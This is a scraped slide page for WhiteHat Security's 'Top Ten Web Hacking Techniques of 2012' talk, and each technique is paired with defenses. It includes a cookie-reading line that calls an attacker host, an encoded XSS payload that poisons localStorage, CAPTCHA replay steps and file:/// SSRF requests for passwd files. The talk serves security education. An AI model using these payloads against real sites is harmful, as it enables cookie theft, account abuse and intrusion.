AI presentation and introduction - Retrieval Augmented Generation RAG 101AI presentation and introduction - Retrieval Augmented Generation RAG 101
AI presentation and introduction - Retrieval Augmented Generation RAG 101vincent683379
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKUXDXConf
 
Server-Driven User Interface (SDUI) at Priceline
Server-Driven User Interface (SDUI) at PricelineServer-Driven User Interface (SDUI) at Priceline
Server-Driven User Interface (SDUI) at PricelineUXDXConf
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxAbida Shariff
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekCzechDreamin
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaCzechDreamin
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessUXDXConf
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsStefano
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCzechDreamin
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaRTTS
 

Recently uploaded (20)

IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and Planning
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
 
Intelligent Gimbal FINAL PAPER Engineering.pdf
Intelligent Gimbal FINAL PAPER Engineering.pdfIntelligent Gimbal FINAL PAPER Engineering.pdf
Intelligent Gimbal FINAL PAPER Engineering.pdf
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Enterprise Security Monitoring, And Log Management.
Enterprise Security Monitoring, And Log Management.Enterprise Security Monitoring, And Log Management.
Enterprise Security Monitoring, And Log Management.
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John Staveley
 
Transforming The New York Times: Empowering Evolution through UX
Transforming The New York Times: Empowering Evolution through UXTransforming The New York Times: Empowering Evolution through UX
Transforming The New York Times: Empowering Evolution through UX
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
AI presentation and introduction - Retrieval Augmented Generation RAG 101
AI presentation and introduction - Retrieval Augmented Generation RAG 101AI presentation and introduction - Retrieval Augmented Generation RAG 101
AI presentation and introduction - Retrieval Augmented Generation RAG 101
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
Server-Driven User Interface (SDUI) at Priceline
Server-Driven User Interface (SDUI) at PricelineServer-Driven User Interface (SDUI) at Priceline
Server-Driven User Interface (SDUI) at Priceline
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara Laskowska
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for Success
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 

Top Ten Web Hacking Techniques of 2012

  • 1. TOP TEN WEB HACKING TECHNIQUES OF 2012
  • 2. ABO U T Jeremiah Grossman • Founder & CTO of WhiteHat Security • TED Alumni • InfoWorld Top 25 CTO • Co-founder of the WASC • Co-author: XSS Attacks • Former Yahoo! information security officer • Brazilian Jiu-Jitsu Black Belt Matt Johansen • Head of WhiteHat's Threat Research Center • BlackHat, DEFCON, RSA Speaker • Oversees assessment of 15,000+ websites • Background in Penetration Testing • Hacker turned Management • I'm hiring… a lot… © 2013 WhiteHat Security, Inc. 2
  • 3. ABO U T WhiteHat Security, Inc. • Founded 2001 • Head quartered in Santa Clara, CA • Employees: 260+ • WhiteHat Sentinel: SaaS end-to-end website risk management platform (static and dynamic analysis) • Customers: 500+ (banking, retail, healthcare, etc.) © 2013 WhiteHat Security, Inc. 3
  • 4. ABOUT THE TOP TEN © 2013 WhiteHat Security, Inc. 4
  • 5. ―Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack.‖ © 2013 WhiteHat Security, Inc. 5
  • 6. H ISTO RY Past Years 2011 • BEAST (51 new techniques) 2010 • 'Padding Oracle' Crypto Attack (69 new techniques) 2009 • Creating a rogue CA certificate (80 new techniques) 2008 • GIFAR (GIF + JAR) (70 new techniques) 2007 • XSS Vulnerabilities in Common (83 new techniques) Shockwave Flash Files 2006 • Web Browser Intranet Hacking / Port (65 new techniques) Scanning © 2013 WhiteHat Security, Inc. 6
  • 7. T H E YEAR 2 0 1 2 56 NEW Techniques 1. CRIME 2. Pwning via SSRF (memcached, php-fastcgi, etc) 3. Chrome addon hacking 4. Bruteforce of PHPSESSID 5. Blended Threats and JavaScript 6. Cross-Site Port Attacks 7. Permanent backdooring of HTML5 client-side application 8. CAPTCHA Re-Riding Attack 9. XSS: Gaining access to HttpOnly Cookie in 2012 10.Attacking OData: HTTP Verb Tunneling, etc. http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of- 2012/ © 2013 WhiteHat Security, Inc. 7
  • 8. 2 0 1 2 TO P T EN Attacking Odata: HTTP Verb Tunneling, Navigation Properties for Additional Data Access, System Query Options ($select) ―The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP-based RESTful data services that can be used to publish and edit resources that are identified using uniform resource identifiers (URIs) with simple HTTP messages. This paper looks at OData from a penetration testing perspective and introduces various OData concepts as we progress.‖ Gursev Singh Kalra http://www.mcafee.com/us/resources/white-papers/foundstone/wp-pentesters-guide-to-hacking-odata.pdf © 2013 WhiteHat Security, Inc. 8
  • 9. 2 0 1 2 TO P T EN XSS: Gaining access to HttpOnly Cookie in 2012 ‗If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script. As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser will not reveal the cookie to a third party. The following describes techniques to gain access to HttpOnly cookie data via client- side attack.‖ http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html © 2013 WhiteHat Security, Inc. 9
  • 10. BASIC S HttpOnly cookie flag Set-Cookie: <name>=<value>[; <Max-Age>=<age>] [; expires=<date>][; domain=<domain_name>] [; path=<some_path>][; secure][; HttpOnly] js> alert(document.cookie); When a cookie has an HttpOnly cookie flag the returned value is blank. https://www.owasp.org/index.php/HttpOnly © 2013 WhiteHat Security, Inc. 10
  • 11. H ISTO RY CROSS-SITE TRACING (XST) [circa 2003] Force cookie values into the body of the HTTP response where there is no HttpOnly protection. <script> TRACE / HTTP/1.1 var xmlhttp = new XMLHttpRequest(); Host: foo.bar var url = 'http://foo.com/'; HTTP/1.1 200 OK // send cookie header Date: Mon, 02 Dec 2002 19:24:51 GMT xmlhttp.withCredentials = true; Server: Apache/2.0.40 (Unix) xmlhttp.open('TRACE', url, false); Content-Type: message/http xmlhttp.send(); TRACE / HTTP/1.1 </script> Host: foo.com Cookie: httpOnly cookie value Performing an XST attack, at the time, required either a cross-domain browser vulnerability, or an XSS vulnerability in the target website. https://www.owasp.org/index.php/Cross_Site_Tracing http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf © 2013 WhiteHat Security, Inc. 11
  • 12. BR O W SER F IX No TRACE (No TRACK) Today, no modern browser allows javascript to use these HTTP request methods. The same is true of Flash, Silverlight, and Java Applets. Well, almost… © 2013 WhiteHat Security, Inc. 12
  • 13. XST 2 0 1 2 Java Applet (PoC) getHeaderField, under the java.net.URLConnection package Applet requests a URL and reads set-cookie response header alert(new java.net.URL('http://attacker.in/xss/cookie.php').openConnection().getHeaderFi eld('set-cookie')); “…a vulnerable page in a real- world application may have already issued the HttpOnly cookie by the time the script has executed.” Might also be able force out all cookies by overloading them. Cookie Exhaustion. http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010 © 2013 WhiteHat Security, Inc. 13
  • 14. SO L U T ION UNINSTALL JAVA [on the client, not the server] For this and about 1,000 other [zero-day] reasons. © 2013 WhiteHat Security, Inc. 14
  • 15. 2 0 1 2 TO P T EN CAPTCHA Re-Riding Attack ―CAPTCHA Re-Riding Attack bypasses the CAPTCHA protection built into the web applications. The attack exploits the fact that the code that verifies CAPTCHA solutions sent by the user during form submissions does not clear the CAPTCHA solution from the HTTP Session.‖ Completely Automated Public Turing test to tell Computers and Humans Apart Gursev Singh Kalra http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html © 2013 WhiteHat Security, Inc. 15
  • 16. BASIC S CAPTCHA Protected Registration Flow © 2013 WhiteHat Security, Inc. 16
  • 17. T EL LTAL E SIG N S What to look for… 1) captcha.php is responsible for updating the HTTP session with correct CAPCHA solution. 2) CAPTCHA solution inside the HTTP session is not explicitly cleared during the verification process. 3) After registration succeeds, users are redirected to next step and the CAPTCHA generation page (/captcha.php) is not likely called for current SESSION again. Allows CAPTCHA solution to stay stored for as long as SESSION is valid. Two possible vulnerable behavior: a. Web application uses the same SESSIONID for the same HTTP session. b. Web application generates a new SESSIONID for the same HTTP session. In either case, the HTTP Session continues to store the CAPTCHA solution as it is not explicitly cleared by the CAPTCHA verification code…. © 2013 WhiteHat Security, Inc. 17
  • 18. AT TAC K 3a) 1) Load the register page of the target website in a web browser. 2) Solve the CAPTCHA manually and submit the form. 3) Record form submission using a web proxy. This request contains a valid SESSIONID, valid form fields, and a valid CAPTCHA solution. 4) Create a custom script that repeatedly sends this request to the server. With each request change the unique values (like User ID) to create multiple new accounts with a single CAPTCHA solution. © 2013 WhiteHat Security, Inc. 18
  • 19. AT TAC K 3b) 1) Load the register page of the target website in a web browser. 2) Solve the CAPTCHA manually, and submit the form. 3) Trap this request in a web proxy and do not allow it to reach the web server. This request contains a valid SESSIONID, valid form fields and a valid CAPTCHA solution. 4) Create a custom script that repeatedly sends this request to server. 5) Submit one request. 6) Upon successful submission, the web application will reset the current SESSIONID and send new SESSIONID back in response headers. 7) Change the value of SESSIONID in recorded request (step 3) to the value copied from response in Step 6 above. 8) Go to step 5. 9) Able to make multiple successful submissions with single CAPTCHA solution. © 2013 WhiteHat Security, Inc. 19
  • 20. D EF EN SE ―The best defense is to reset CAPTCHA solution inside the HTTP session during the CAPTCHA verification stage. It is also important to note that when a website relies on third-party CAPTCHA provider, it does not maintain any session information at its end and CAPTCHA is performed by the CAPTCHA provider. These websites are not vulnerable to CAPTCHA Re-Riding Attack.‖ © 2013 WhiteHat Security, Inc. 20
  • 21. 2 0 1 2 TO P T EN Permanent backdooring of HTML5 client-side application ―To improve performance, particularly for mobile users, many websites have started caching app logic on client devices via HTML5 local storage. Unfortunately, this can make common injection vulnerabilities even more dangerous, as malicious code can invisibly persist in the cache. Real-world examples of this problem have now been discovered in third-party ―widgets‖ embedded across many websites, creating security risks for the companies using such services – even if their sites are otherwise protected against attacks.‖ Joey Tyson http://securitymusings.com/article/3159/how-a-platform-using-html5-can-affect-the-security-of-your-website © 2013 WhiteHat Security, Inc. 21
  • 22. PR ER EQ U ISIT ES What to watch out for… • A Web application caching [javascript] code in HTML5 local storage, rather than routinely downloading it across the network every time the app/page is visited. Developers find doing this may provide a significant performance boost, particularly on mobile devices, where bandwidth and typical caches can be much more limited. What the bad guy may do next… • If the code saved in the local storage is compromised, via XSS exploit for example, an attacker could inject malicious code that persists in the client-side cache. This payload would then be executed by the web app each time a user opens the site – even if they‘d previously closed the browser. A single ―reflected‖ XSS attack can poison the local storage for every following page the user visits on that site. © 2013 WhiteHat Security, Inc. 22
  • 23. M ASS PW N AG E Making Matters Worse: • Eradicating such [malicious] code can be quite difficult, and the victim website might not even be able to detect an ongoing attack. • Reminder: When a developer includes third-party JavaScript on his or her site, that code has the same capabilities as any other script on the page. • Modifying static file on a remote server is generally not possible, even if cross-site scripting issues are present, but what if a third-party script from a site with XSS problems also stored code in local storage? “If content from the compromised origin is commonly embedded on third-party pages (think syndicated „like‟ buttons or advertisements), with some luck, attacker‟s JavaScript may become practically invincible.” - Michal Zalewski http://events.ccc.de/congress/2011/Fahrplan/events/4811.en.html http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html © 2013 WhiteHat Security, Inc. 23
  • 24. IN - T H E -WILD Apture (acquired by Google): • Provided pop-up boxes for exploring content related to highlighted terms in a page. • A 3rd-party ―widget‖ service that used local storage code caching – and a page on the same domain as those scripts had a reflected XSS vulnerability which could be used to inject malicious code in the cache. This code would then be executed in the context of the site using Apture. The problem with Apture‘s service affected the security of many sites across the web. © 2013 WhiteHat Security, Inc. 24
  • 25. U SAG E To use Apture widgets: • Dynamically loaded an external script hosted on apture.com with a site token specified. This code loaded another script based on the user‘s browser which actually began setting up the framework for Apture to integrate with the site‘s content. • The script inserted an inline frame into the page that loaded a file from cdn.apture.com. A callback function allowed this iframe to pass messages back to the original window context where the script is running (the non-Apture site). This iframe then loaded the actual app logic and passed the code back to the original site via the cross-document messaging interface. • Apture‘s iframe setup allowed them to take advantage of another HTML5 innovation that made their service load much faster. Web storage functionality provides the localStorage object, a place to save key/value data on the client which allows for more space and flexibility than cookies. • Apture used a localStorage object for cdn.apture.com not only to save data, such as an ID for tracking users, but to actually cache their app logic code. If the cdn.apture.com iframe detected that this cache already existed, it would simply load the code from localStorage rather than issue another HTTP request for the 272KB worth of JavaScript – saving time and bandwidth. © 2013 WhiteHat Security, Inc. 25
  • 26. EXPL O ITAT ION EVAL is EVIL Like everyone else, Apture had an exploitable XSS vulnerability. This URL includes a script that appends ―alert(document.cookie)‖ to the app logic in localStorage: http://cdn.apture.com/search/xss?yt=%22%3E%3Cscript%3Eif%28window.x%21%3D1%29%7Blo calStorage%5B%27app-49971756%27%5D%3DlocalStorage%5B%27app- 49971756%27%5D%2b%22alert%28document.cookie%29%3B%22%7Dwindow.x%3D1%3C% 2fscript%3E Once this vulnerability is used to insert attack code into localStorage, visiting any site that had Apture‘s widgets would cause the attack code to be loaded from the Apture iframe and executed in the context of the non-Apture site. Since this is essentially an example of DOM-based XSS (the code is loaded dynamically on the client side), requests sent to those sites‘ servers would not include any XSS fingerprints, such as <script> in a GET or POST parameter. The localStorage code caching turned one reflected XSS vulnerability on Apture’s site into persistent, client-side XSS across all domains using their service. © 2013 WhiteHat Security, Inc. 26
  • 27. D EF EN SE No Simple Answers  Trade-offs between performance and risk • Application cache, another new HTML5 features, is actually geared towards precisely this use case and harder to compromise, but it can create UI warnings in some browsers [Firefox]. (Such warnings are a good practice, but undesirable for third-party widgets.) • Data in local storage should be treated as untrusted, even if it‘s just content instead of code. • If local storage is used for scripts, it should be accessed from a domain only serving static files, which reduces the likelihood of XSS vulnerabilities. • Newer browsers also support features such as sandboxed inline frames and Content Security Policy that could help limit the impact of embedded widgets if they became compromised. © 2013 WhiteHat Security, Inc. 27
  • 28. 2 0 1 2 TO P T EN Cross-Site Port Attacks ―Many web applications provide functionality to pull data from other webservers for various reasons. Using user specified URLs, web applications can be made to fetch images, download XML feeds from remote servers, text based files etc. This functionality can be abused by making crafted queries using the vulnerable web application as a proxy to attack other services running on remote/local servers. Attacks arising via this abuse of functionality are named as Cross- Site Port Attacks (XSPA).‖ ―Riyaz Ahemed Walikar http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html Robert Hansen http://www.sectheory.com/intranet-hacking.htm © 2013 WhiteHat Security, Inc. 28
  • 29. 3 - T IER XSPA allows attackers to abuse functionality in web applications to: 1. Port Scan remote Internet facing servers, intranet devices and the local web server itself. 2. Exploiting vulnerable programs running on the Intranet or on the local web server 3. Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.) 4. Fingerprinting intranet web applications using standard application default files & behavior 5. Reading local web server files using the file:/// protocol handler. © 2013 WhiteHat Security, Inc. 29
  • 30. T EL LTAL E SIG N © 2013 WhiteHat Security, Inc. 30
  • 31. C O D E SAMPL E <?php if (isset($_POST['url'])) { $link = $_POST['url']; $filename = './curled/'.rand().'txt'; $curlobj = curl_init($link); $fp = fopen($filename,"w"); curl_setopt($curlobj, CURLOPT_FILE, $fp); curl_setopt($curlobj, CURLOPT_HEADER, 0); curl_exec($curlobj); curl_close($curlobj); fclose($fp); $fp = fopen($filename,"r"); $result = fread($fp, filesize($filename)); fclose($fp); echo $result; ?> © 2013 WhiteHat Security, Inc. 31
  • 32. R EAL - W ORL D AT TAC K Port Scanning using Google Webmaster Tools © 2013 WhiteHat Security, Inc. 32
  • 33. AT TAC K Port Scanning using Google Webmaster Tools © 2013 WhiteHat Security, Inc. 33
  • 34. AT TAC K Port Scanning using Google Webmaster Tools © 2013 WhiteHat Security, Inc. 34
  • 35. AT TAC K Reading local files using file:/// protocol Request: file:///C:/Windows/win.ini © 2013 WhiteHat Security, Inc. 35
  • 36. AT TAC K Adobe's Omniture web application file:///etc/passwd © 2013 WhiteHat Security, Inc. 36
  • 37. D EF EN SE • Response Handling: If a web application expects specific content type on the server, programmatically ensure the data received satisfies checks imposed on the server before displaying or processing the data for the client. • Error handling and messages: Display generic error messages when something goes wrong. If content type validation fails, display generic errors to the client like "Invalid Data retrieved". Also ensure message are the same when the request fails on the backend and if invalid data is received. This prevents the application from being abused as distinct error messages will be absent for closed and open ports. • Restrict connectivity to HTTP based ports: Restrict the ports to which the web application can connect to, such as HTTP ports: 80, 443, 8080, 8090 etc. Doing so can lower the attack surface. • Blacklist IP addresses: Internal IP addresses, localhost specifications and internal hostnames can all be blacklisted to prevent the web application from being abused to fetch data/attack these devices. • Disable unwanted protocols: Only allow http and https to make requests to remote servers. Whitelisting these protocols will prevent the web application from making requests over other protocols like file:///, gopher://, ftp:// and other URI schemes. © 2013 WhiteHat Security, Inc. 37
  • 38. 2 0 1 2 TO P T EN Blended Threats and JavaScript ―During 2006, it was shown how common Web browser attacks could be leveraged bypass perimeter firewalls. In the years since, the fundamental problems were never addressed and the Intranet remains wide open, probably because the attack techniques described had important limitations. These limitations prevented mass scale and persistent compromise of network connected devices, which include but are not limited to home broadband routers. Now in 2012, with the help of new research and next-generation technologies like HTML5, browser-based Intranet attacks have overcome many of the old limitations and improved to a new degree of scary.‖ Phil Purviance and Josh Brashars https://superevr.com/blog/2012/blended-threats-and-javascript/ © 2013 WhiteHat Security, Inc. 38
  • 39. BASIC S Web Threats -> Network Compromise • Utilize an XSS bug to poke holes in Intranet network • Take advantage of very outdated security in routers • Flash the firmware of that router via XSS, File Upload Abuse, & CSRF • Permanent compromise © 2013 WhiteHat Security, Inc. 39
  • 40. T H E AT TAC K Scan The Intranet Yay HTML5! JavaScript Intranet scan, nothing new or fancy but does return a list of internal Ips that are up and listening. © 2013 WhiteHat Security, Inc. 40
  • 41. T H E AT TAC K Gain Access The easy way © 2013 WhiteHat Security, Inc. 41
  • 42. Real World Examples © 2013 WhiteHat Security, Inc. 42
  • 43. T H E AT TAC K Gain Access The less easy way © 2013 WhiteHat Security, Inc. 43
  • 44. Basic Auth Brute Force © 2013 WhiteHat Security, Inc. 44
  • 45. EXPL O IT HTML5 File Upload Load Malicious Firmware to memory https://github.com/superevr/ddwrt-install-tool © 2013 WhiteHat Security, Inc. 45
  • 46. D EF EN SE Router • Change default passwords! Browser • NoScript, Request Policy, Other XSS & CSRF protections © 2013 WhiteHat Security, Inc. 46
  • 47. 2 0 1 2 TO P T EN Bruteforce of PHPSESSID ―...We provide a number of practical techniques and algorithms for exploiting randomness vulnerabilities in PHP applications. We focus on the predictability of password reset tokens and demonstrate how an attacker can take over user accounts in a web application via predicting or algorithmically derandomizing the PHP core randomness generators.‖ Arseny Reutov, Timur Yunusov, and Dmitry Nagibin http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html George Argyros and Aggelos Kiayias http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks.html © 2013 WhiteHat Security, Inc. 47
  • 48. BASIC S PHPSESSID = md5( client IP . timestamp . microseconds1 . php_combined_lcg() ) • client IP is known to the attacker; • timestamp is known through Date HTTP-header; • microseconds1 – a value from 0 to 1000000; • php_combined_lcg() – an example value is 0.12345678. To generate php_combined_lcg(), two seeds are used: S1 = timestamp XOR (microseconds2 << 11) S2 = pid XOR (microseconds3 << 11) • timestamp is the same; • microseconds2 is greater than microseconds1 (when the first time measurement was made) by 0–3; • pid is the id of the current process (0–32768, 1024–32768 on Unix); • microseconds3 is greater than microseconds2 by 1–4. “The greatest entropy is contained in microseconds1, however with the use of two techniques it can be substantially reduced.” © 2013 WhiteHat Security, Inc. 48
  • 49. T EC H N IQ UE 1 Adversarial Time Synchronization ATS: Send a pair of HTTP requests to determine the moment when the second in the Date HTTP header changes. 1) Connect to a web server and send request pairs: 1st to a non- existent page so it‘ll take a minimum time for the web-server to return the response. The 2nd to our target web-application. HTTP/1.1 200 OK 2) Get an average time interval between sending an HTTP Date: Wed, 08 Aug 2012 06:05:14 GMT request and receiving the response (= RTT) … HTTP/1.1 200 OK 3) When the seconds in Date HTTP-header of the two requests Date: Wed, 08 Aug 2012 06:05:15 GMT changed approximate the time of remote microseconds in local time using RTTs of the two requests divided by two and offsetting the delay between requests. 4) If session_start() is called somewhere deeper in the code, you may try to install the web-app locally and get the approximate time when it is called. “...the microseconds between our requests zeroed. By sending requests with dynamic delays it is possible to synchronize local value of microseconds with the server one.” © 2013 WhiteHat Security, Inc. 49
  • 50. T EC H N IQ UE 2 Request Twins Attacker send two requests: the 1st — to reset their own password and the 2nd — to reset that of an administrator. The gap between microseconds will be minimal. To increase speed over the PasswordPro module by taking advantage of positive linear correlation between deltas of microseconds, they created their own application. 16 million hashes per second, seed calculation takes less than an hour on 3.2 GHz Quad Core i5. Having pid and php_combined_lcg one can compute the seed used in mt_rand. (timestamp x pid) XOR (106 x php_combined_lcg()) “if a web application uses standard PHP sessions, it is possible to obtain the random numbers generated via mt_rand(), rand(), and uniqid().” © 2013 WhiteHat Security, Inc. 50
  • 51. T EC H N IQ UE 3 Get mt_rand seed through random numbers leakage “The seed used for mt_rand is an unsigned integer 2^32. If a random number leaked, it is possible to get the seed using PHP itself and rainbow tables. It takes less than 10 minutes.” The scripts to generate rainbow tables, search the seed, and ready-made tables http://www.gat3way.eu/poc/mtrt/ © 2013 WhiteHat Security, Inc. 51
  • 52. SO L U T IONS What to look for and code defense “All the mt_rand(), rand(), uniqid(), shuffle(), lcg_value(), etc. The only secure function is openssl_random_pseudo_bytes(), but it is rarely used in web applications.” • MySQL function RAND() — it can be also predicted though. • Suhosin patch — does not patch mt_srand, srand. The Suhosin extension should also be installed. • /dev/urandom — the securest way. © 2013 WhiteHat Security, Inc. 52
  • 53. 2 0 1 2 TO P T EN Chrome addon hacking ―Webpages can sometimes interact with Chrome addons and that might be dangerous. Chrome addons fingerprinting, universal XSS, bypass AdBlock, Chrome Extension Exploitation Framework, and owning a system.‖ ―Krzysztof Kotowicz http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html http://blog.kotowicz.net/2012/02/chrome-addons-hacking-want-xss-on.html http://blog.kotowicz.net/2012/03/chrome-addons-hacking-bye-bye-adblock.html http://blog.kotowicz.net/2012/07/xss-chef-chrome-extension-exploitation.html http://blog.kotowicz.net/2012/09/owning-system-through-chrome-extension.html © 2013 WhiteHat Security, Inc. 53
  • 54. H ISTO RY Hacking Google ChromeOS “Googleʼsdrive to move away from the desktop, and into the cloud results in desktop applications being replaced with HTML5 & JavaScript rich extensions. These new “desktop programs” seem to be more secure, because they do not have the classic vulnerabilities that desktop applications end services have--buffer/stack/heap overflows/underflows, format string attacks, plus many more. Since exploitation no longer leads to shell, the real dangers and implications of any exploit seem to be mitigated. Unfortunately, this is not true. HTML and Javascript applications (Chrome Extensions) are now vulnerable to standard HTML and Javascript attacks. The most serious, in this situation, is Cross Site Scripting. By utilizing an XSS vulnerability in an extension, an attacker can pivot from that extension, and take advantage of the permissions given to it to attack and gain access to user information loaded in other tabs.” -Matt Johansen & Kyle Osborn BlackHat 2011 WhitePaper © 2013 WhiteHat Security, Inc. 54
  • 55. BASIC S Why Chrome Extensions? • Basic HTML applications • Access to extensive APIs • Permissions set by 3rd party Dev • Manifest.json • Sandbox side-step Exploitation • Universal XSS via 1 extension bug • chrome.tabs, chrome.history, chrome.cookies, chrome.proxy, API access make for powerful attacks • Filesystem access and remote code execution made easy © 2013 WhiteHat Security, Inc. 55
  • 56. APPL IC AT IO N BeEF & ChEF • You‘ve found XSS in an extension, utilized it to exploit Javascript in any tab. Now what? Browser Exploitation Framework & Chrome Extension Exploitation Framework • BeEF – Metasploit of the web. Makes reflective XSS more persistent and able to replay exploits • ChEF – BeEF for Chrome Extensions. • Monitor current sessions / open tabs • Execute JavaScript on any site in any tab • Access localStorage • Read / write cookies • Manipulate browser history • Take screenshots • Inject BeEF hooks to utilize their payloads and exploits © 2013 WhiteHat Security, Inc. 56
  • 57. C H EF ChEF Console © 2013 WhiteHat Security, Inc. 57
  • 58. EXPL O ITAT ION XSS Everywhere • If an extension‘s ‗manifest.json‘ file has permissions set to ‗*‘ you can execute JavaScript anywhere in the browser with ‗chrome.tab.executeScript‘ • Bypass AdBlock: By altering the DOM you can create a global whitelist © 2013 WhiteHat Security, Inc. 58
  • 59. D EF EN SE Beware © 2013 WhiteHat Security, Inc. 59
